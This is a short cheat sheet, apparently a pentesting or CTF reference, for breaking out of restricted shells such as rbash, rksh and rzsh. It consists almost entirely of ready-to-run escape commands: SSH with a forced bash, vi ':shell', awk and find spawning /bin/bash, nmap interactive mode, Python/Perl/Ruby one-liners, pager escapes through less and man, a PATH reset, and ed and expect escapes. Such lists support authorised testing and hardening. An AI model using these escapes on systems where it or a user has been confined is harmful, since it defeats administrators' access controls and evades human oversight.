Restricted Shell Escapes
Breaking out of rbash, rksh, rzsh, and limited shells.
Identify restricted shell
Check what you're working with
echo $SHELL
echo $0
echo $PATH
SSH escape
Bypass restricted shell at login
ssh user@$IP -t bash
ssh user@$IP -t /bin/sh
ssh user@$IP -t "bash --noprofile"
vi / vim escape
Open vi then spawn shell
vi
:set shell=/bin/bash
:shell
# Or: :!/bin/bash
awk / find / nmap escape
Common binary escapes
awk 'BEGIN {system("/bin/bash")}'
find / -exec /bin/bash \;
nmap --interactive # nmap < 5.35
!sh
Python/Perl/Ruby escape
Scripting language shells
python3 -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
ruby -e 'exec "/bin/bash"'
less/more/man escape
Pager commands — Drop to shell
less /etc/passwd
!/bin/bash
man man
!/bin/bash
PATH manipulation
If PATH is restricted — Set it manually
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ed / expect escape
Less common escapes
ed
!'/bin/bash'
expect -c 'spawn /bin/bash; interact'